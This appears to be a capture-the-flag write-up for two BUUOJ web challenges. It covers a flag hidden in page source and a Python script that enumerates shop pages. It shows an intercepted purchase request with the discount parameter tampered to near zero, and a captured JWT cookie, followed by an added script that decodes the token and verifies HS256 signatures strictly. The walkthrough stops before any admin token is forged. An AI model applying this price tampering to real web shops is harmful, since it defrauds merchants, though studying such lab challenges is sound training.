[BSidesCF 2019]Futurella

Open the page and you see a block of alien gibberish. Press F12 to open the developer tools and view the page source; the flag is there.

[CISCN2019 华北赛区 Day1 Web2]ikun

Open the page and register/log in first. The hint reads "ikun们冲鸭,一定要买到lv6!!!" (roughly: "ikuns, go! Make sure you buy lv6!!!"), which means we need to buy a level-6 account, so we use a script to find which shop page the lv6 item is on:

import requests

# Walk the shop pages in order until one of them shows the lv6 item image
for i in range(1, 1000):
    url = "http://0a047e4f-ced1-4f90-9dcd-663cef470c0f.node3.buuoj.cn/shop?page={}".format(i)
    print(url)
    r = requests.get(url)
    if r.status_code == 200 and "lv6.png" in r.text:
        print("find it:", url)
        break

It turns out to be on page 181. Go to page 181, click Buy, and intercept the request with Burp Suite at the same time:

POST /shopcar HTTP/1.1
Host: 36b85929-6539-4426-9896-e26feab990ea.node4.buuoj.cn
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://36b85929-6539-4426-9896-e26feab990ea.node4.buuoj.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://36b85929-6539-4426-9896-e26feab990ea.node4.buuoj.cn/shopcar
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _xsrf=2|3838073a|d9aeab83c56fb9d3c045fd385aeb54a5|1626027539; JWT=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEyMyJ9.t_quUTD2cAx9tGvCi1tmfSmgP_z_hr2N8lx_Ij5bh78; commodity_id="2|1:0|10:1626027606|12:commodity_id|8:MTYyNA==|02ef09725be9c5bcf6002e383a11f1ccfad68a4696d9d4880f626114676c32c6"
Connection: close

_xsrf=2%7Ca5eaf832%7C447c548b58bd46db5d970230c739abad%7C1626027539&id=1624&price=1145141919.0&discount=0.8

Change the discount parameter to 0.000000001 and forward the request; the response is:

HTTP/1.1 302 Found
Server: openresty
Date: Sun, 11 Jul 2021 18:21:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Location: /b1g_m4mber

This reveals a new page. Enter the URL in the browser:

http://4683139b-3505-4d17-970d-db6537af0224.node4.buuoj.cn/b1g_m4mber

The page says only admin is allowed to access it. Refresh and intercept the request:

GET /b1g_m4mber HTTP/1.1
Host: 36b85929-6539-4426-9896-e26feab990ea.node4.buuoj.cn
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _xsrf=2|3838073a|d9aeab83c56fb9d3c045fd385aeb54a5|1626027539; JWT=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEyMyJ9.t_quUTD2cAx9tGvCi1tmfSmgP_z_hr2N8lx_Ij5bh78; commodity_id="2|1:0|10:1626027606|12:commodity_id|8:MTYyNA==|02ef09725be9c5bcf6002e383a11f1ccfad68a4696d9d4880f626114676c32c6"
If-None-Match: "c63998d5bdcbf56c96cd396256e18ee05bfc4f3e"
Connection: close

There is a JWT field in the cookie, so the idea is to use the JWT to obtain admin privileges.

JSON Web Token (JWT) is a JSON-based open standard (RFC 7519) for passing claims between parties in a web application environment. The token is designed to be compact and secure, and is particularly suited to single sign-on (SSO) across distributed sites. JWT claims are generally used to pass an authenticated user's identity between an identity provider and a service provider so that resources can be fetched from a resource server; additional claims needed by other business logic can be included as well. The token can also be used directly for authentication, and it can be encrypted.
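As an added example (not part of the original writeup), the script below decodes the JWT captured in the request above to show its header and claims, and then shows how a server should verify an HS256 token: pin the algorithm, recompute the HMAC, and compare in constant time. The signing key is a constructed placeholder, since the challenge's real key is not on the page.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# The JWT copied from the intercepted request (header.payload.signature)
PAGE_JWT = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
            "eyJ1c2VybmFtZSI6IjEyMyJ9."
            "t_quUTD2cAx9tGvCi1tmfSmgP_z_hr2N8lx_Ij5bh78")

def b64url_decode(segment: str) -> bytes:
    """JWT uses unpadded base64url; restore the padding before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def inspect_jwt(token: str) -> Tuple[dict, dict]:
    """Decode header and claims WITHOUT checking the signature (inspection only)."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))

def mint_hs256(claims: dict, key: bytes) -> str:
    """Issue a token the way the server would, with a compact header and an HMAC-SHA256 tag."""
    header = json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode()
    payload = json.dumps(claims, separators=(",", ":")).encode()
    signing_input = f"{b64url_encode(header)}.{b64url_encode(payload)}"
    tag = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(tag)}"

def verify_hs256(token: str, key: bytes) -> Optional[dict]:
    """Server-side check; returns the claims on success and None on any failure."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        tag = b64url_decode(sig_b64)
    except ValueError:  # wrong segment count, bad base64, or bad JSON
        return None
    # Never let the token pick the algorithm: anything but HS256 is rejected outright
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(b64url_decode(payload_b64))

if __name__ == "__main__":
    print(inspect_jwt(PAGE_JWT))  # header and claims of the captured token
```

With the constructed key, a token whose payload is swapped to another username without re-signing fails verification, as does the captured token itself, because its key is unknown.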
